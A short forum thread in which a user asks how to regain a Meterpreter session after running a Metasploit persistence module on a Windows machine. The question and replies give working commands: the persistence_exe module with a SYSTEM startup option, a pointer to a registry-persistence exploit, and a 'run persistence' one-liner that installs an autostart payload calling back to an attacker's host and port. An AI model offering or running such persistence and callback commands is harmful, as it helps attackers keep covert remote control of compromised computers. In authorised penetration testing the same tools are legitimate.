Forum Thread: Meterpreter Persitence

Hello guys, i just have a dumb question but i couldn't find the answer, after using the persitence script in meterpreter "run post/windows/manage/persistence_exe REXEPATH=/local/path/to/your/payload.exe REXENAME=default.exe STARTUP=SYSTEM"

How do i get another meterpreter session opened ? Is there a way to do that ? If so, please inform me, Thank you

2 Responses

The computer would need to be restarted. It runs at startup. If it doesn't work, try Exploit/windows/local/registry-persistence

Use this cmd instead:

  • run persistence -h
  • run persistence –A –L c:\\ -X 30 –p "$port" –r "$lhost"

Share Your Thoughts

  • Hot
  • Active